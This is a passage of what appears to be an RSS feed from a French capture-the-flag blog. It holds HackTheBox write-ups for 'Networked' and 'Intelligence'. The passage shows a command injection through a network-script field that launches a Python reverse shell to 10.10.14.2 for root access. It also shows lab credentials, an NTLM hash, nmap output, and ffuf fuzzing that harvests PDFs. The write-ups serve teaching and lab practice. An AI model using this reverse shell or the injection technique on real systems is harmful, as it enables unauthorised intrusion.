class="nv">$var</span><span class="s2">:&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">read</span> x </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="o">[[</span> ! <span class="nv">$x</span> <span class="o">=</span>~ <span class="nv">$regexp</span> <span class="o">]]</span><span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="s2">&#34;wrong input, try again&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="s2">&#34;interface </span><span class="nv">$var</span><span class="s2">:&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nb">read</span> x </span></span><span class="line"><span class="cl"> <span class="k">done</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="nv">$var</span><span class="o">=</span><span class="nv">$x</span> &gt;&gt; /etc/sysconfig/network-scripts/ifcfg-guly </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/sbin/ifup guly0 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ cat /etc/sysconfig/network-scripts/ifcfg-guly </span></span><span class="line"><span class="cl"><span class="nv">DEVICE</span><span class="o">=</span>guly0 </span></span><span class="line"><span class="cl"><span class="nv">ONBOOT</span><span class="o">=</span>no </span></span><span class="line"><span class="cl"><span class="nv">NM_CONTROLLED</span><span class="o">=</span>no </span></span><span class="line"><span class="cl"><span class="nv">NAME</span><span class="o">=</span>ps /tmp/foo </span></span><span class="line"><span class="cl"><span class="nv">PROXY_METHOD</span><span class="o">=</span>eee </span></span><span class="line"><span class="cl"><span class="nv">BROWSER_ONLY</span><span class="o">=</span>eee </span></span><span class="line"><span class="cl"><span class="nv">BOOTPROTO</span><span class="o">=</span>eee </span></span></code></pre></td></tr></table> </div> </div><h3 id="command-injection">Command Injection </h3><p>On crée un fichier &ldquo;/tmp/shell&rdquo; avec un code pour ouvrir un reverse shell. Ici, j&rsquo;ai choisi d&rsquo;utiliser un reverse shell python. Mais un code Bash classique pouvait fonctionner aussi.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ cat /tmp/shell </span></span><span class="line"><span class="cl">python -c <span class="s1">&#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#34;10.10.14.2&#34;,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&#34;bash&#34;)&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ensuite, on execute notre programme avec <strong>sudo</strong>, et on précise une valeur pour la variable suivi du nom de notre programme pour ouvrir le reverse shell :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ sudo /usr/local/sbin/changename.sh </span></span><span class="line"><span class="cl">interface NAME: </span></span><span class="line"><span class="cl">randomtext /tmp/shell </span></span><span class="line"><span class="cl">interface PROXY_METHOD: </span></span><span class="line"><span class="cl">randomtext </span></span><span class="line"><span class="cl">interface BROWSER_ONLY: </span></span><span class="line"><span class="cl">randomtext </span></span><span class="line"><span class="cl">interface BOOTPROTO: </span></span><span class="line"><span class="cl">randomtext </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">nc -lnvp <span class="m">7777</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::7777 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:7777 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.146. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.146:58160. </span></span><span class="line"><span class="cl"><span class="o">[</span>root@networked network-scripts<span class="o">]</span><span class="c1"># cat /root/root.txt</span> </span></span><span class="line"><span class="cl">cat /root/root.txt </span></span><span class="line"><span class="cl">d1ce.....e93 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/intelligence-htb/Wed, 03 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/intelligence-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Intelligence cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Intelligence</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.248</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Tiffany.Molina : NewIntelligenceCorpUser9876 </span></span><span class="line"><span class="cl">Ted.Graves : Mr.Teddy </span></span><span class="line"><span class="cl">svc_int$:::1dcabcce2cf522bae77d7dc622587879 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.248 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">127</span> Microsoft IIS httpd 10.0 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/10.0 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: OPTIONS TRACE GET HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-09-03 19:34:02Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:37+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:36+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:37+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl">3269/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:36+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49666/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49691/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49692/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49710/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49713/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="intelligencehtb">intelligence.htb </h3><p>On découvre un site web sur le port 80 de notre machine.</p> <h3 id="fuzzing-files">Fuzzing files </h3><p>Sur la page d&rsquo;accueil on nous indique un lien vers un fichier :</p> <blockquote> <p><a class="link" href="http://intelligence.htb/documents/2020-01-01-upload.pdf" target="_blank" rel="noopener" >http://intelligence.htb/documents/2020-01-01-upload.pdf</a> Un deuxième lien est présent avec un fichier contenant une autre date.</p> </blockquote> <p>On fait la déduction que d&rsquo;autres files peuvent etre présents, si l&rsquo;on réussi à faire du <strong>fuzzing</strong> avec la date.</p> <p>Dans un premier temps, on génére donc un fichier Python qui parcourt toutes les dates dans le bon format de 2015 à 2022 pour un premier test. On redirige ensuite la liste dans un fichier.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">from datetime import date, timedelta </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">def daterange<span class="o">(</span>start_date: date, end_date: date<span class="o">)</span>: </span></span><span class="line"><span class="cl"> <span class="nv">days</span> <span class="o">=</span> int<span class="o">((</span>end_date - start_date<span class="o">)</span>.days<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> n in range<span class="o">(</span>days<span class="o">)</span>: </span></span><span class="line"><span class="cl"> yield start_date + timedelta<span class="o">(</span>n<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">start_date</span> <span class="o">=</span> date<span class="o">(</span>2015, 1, 1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">end_date</span> <span class="o">=</span> date<span class="o">(</span>2022, 6, 2<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> single_date in daterange<span class="o">(</span>start_date, end_date<span class="o">)</span>: </span></span><span class="line"><span class="cl"> print<span class="o">(</span>single_date.strftime<span class="o">(</span><span class="s2">&#34;%Y-%m-%d&#34;</span><span class="o">))</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ensuite, on utilise <strong>ffuf</strong> pour faire du fuzzing et récupérer toutes les URL des potentiels fichiers téléchargeables :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ffuf -c -w dates.txt -u <span class="s2">&#34;http://intelligence.htb/documents/FUZZ-upload.pdf&#34;</span> -o results.json -of json </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://intelligence.htb/documents/FUZZ-upload.pdf </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /workspace/Intelligence/dates.txt </span></span><span class="line"><span class="cl"> :: Output file : results.json </span></span><span class="line"><span class="cl"> :: File format : json </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2020-01-01 <span class="o">[</span>Status: 200, Size: 26835, Words: 241, Lines: 209, Duration: 35ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-02 <span class="o">[</span>Status: 200, Size: 27002, Words: 229, Lines: 199, Duration: 31ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-25 <span class="o">[</span>Status: 200, Size: 26252, Words: 225, Lines: 193, Duration: 24ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-20 <span class="o">[</span>Status: 200, Size: 11632, Words: 157, Lines: 127, Duration: 27ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-23 <span class="o">[</span>Status: 200, Size: 11557, Words: 167, Lines: 136, Duration: 35ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-22 <span class="o">[</span>Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 37ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-10 <span class="o">[</span>Status: 200, Size: 26400, Words: 232, Lines: 205, Duration: 40ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-04 <span class="o">[</span>Status: 200, Size: 27522, Words: 223, Lines: 196, Duration: 49ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-30 <span class="o">[</span>Status: 200, Size: 26706, Words: 242, Lines: 193, Duration: 39ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-24 <span class="o">[</span>Status: 200, Size: 27332, Words: 237, Lines: 206, Duration: 23ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-04 <span class="o">[</span>Status: 200, Size: 26194, Words: 235, Lines: 202, Duration: 21ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-28 <span class="o">[</span>Status: 200, Size: 11543, Words: 167, Lines: 131, Duration: 23ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-11 <span class="o">[</span>Status: 200, Size: 25245, Words: 241, Lines: 198, Duration: 29ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-17 <span class="o">[</span>Status: 200, Size: 11228, Words: 167, Lines: 132, Duration: 29ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-23 <span class="o">[</span>Status: 200, Size: 27378, Words: 247, Lines: 213, Duration: 33ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-05 <span class="o">[</span>Status: 200, Size: 26124, Words: 221, Lines: 205, Duration: 33ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-12 <span class="o">[</span>Status: 200, Size: 27143, Words: 233, Lines: 213, Duration: 24ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-21 <span class="o">[</span>Status: 200, Size: 11250, Words: 157, Lines: 134, Duration: 24ms<span class="o">]</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">2021-03-25 <span class="o">[</span>Status: 200, Size: 27327, Words: 231, Lines: 211, Duration: 22ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2021-03-21 <span class="o">[</span>Status: 200, Size: 26810, Words: 229, Lines: 205, Duration: 31ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2021-03-27 <span class="o">[</span>Status: 200, Size: 12127, Words: 166, Lines: 141, Duration: 28ms<span class="o">]</span> </span></span><span class="line"><span class="cl">:: Progress: <span class="o">[</span>2709/2709<span class="o">]</span> :: Job <span class="o">[</span>1/1<span class="o">]</span> :: <span class="m">1562</span> req/sec :: Duration: <span class="o">[</span>0:00:01<span class="o">]</span> :: Errors: <span class="m">0</span> :: </span></span></code></pre></td></tr></table> </div> </div><p>Il faut ensuite parcourir cette liste d&rsquo;url pour télécharger tous les fichiers. En Python, ça nous donne le code suivant :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat ffuf_dl.py </span></span><span class="line"><span class="cl">import json </span></span><span class="line"><span class="cl">import subprocess </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">with open<span class="o">(</span><span class="s2">&#34;results.json&#34;</span><span class="o">)</span> as f: </span></span><span class="line"><span class="cl"> <span class="nv">data</span> <span class="o">=</span> json.load<span class="o">(</span>f<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> result in data<span class="o">[</span><span class="s2">&#34;results&#34;</span><span class="o">]</span>: </span></span><span class="line"><span class="cl"> <span class="nv">url</span> <span class="o">=</span> result<span class="o">[</span><span class="s2">&#34;url&#34;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"> print<span class="o">(</span>f<span class="s2">&#34;[*] Téléchargement de {url}&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> subprocess.run<span class="o">([</span><span class="s2">&#34;wget&#34;</span>, <span class="s2">&#34;-q&#34;</span>, <span class="s2">&#34;-P&#34;</span>, <span class="s2">&#34;pdfs/&#34;</span>, url<span class="o">])</span> </span></span></code></pre></td></tr></table> </div> </div><p>Dans le dossier pdfs/ se trouve une grande quantité de fichiers</p> <h3 id="password-found-in-pdfs">Password found in pdfs </h3><p>J&rsquo;ai utilisé la commande <strong>pdftotext</strong> afin de convertir les pdfs en texte. Ensuite, en affichant le texte de tous les pdfs et en recherchant le mot clé &ldquo;password&rdquo;, on trouve un match ! Le mot de passe : <code>NewIntelligenceCorpUser9876</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ <span 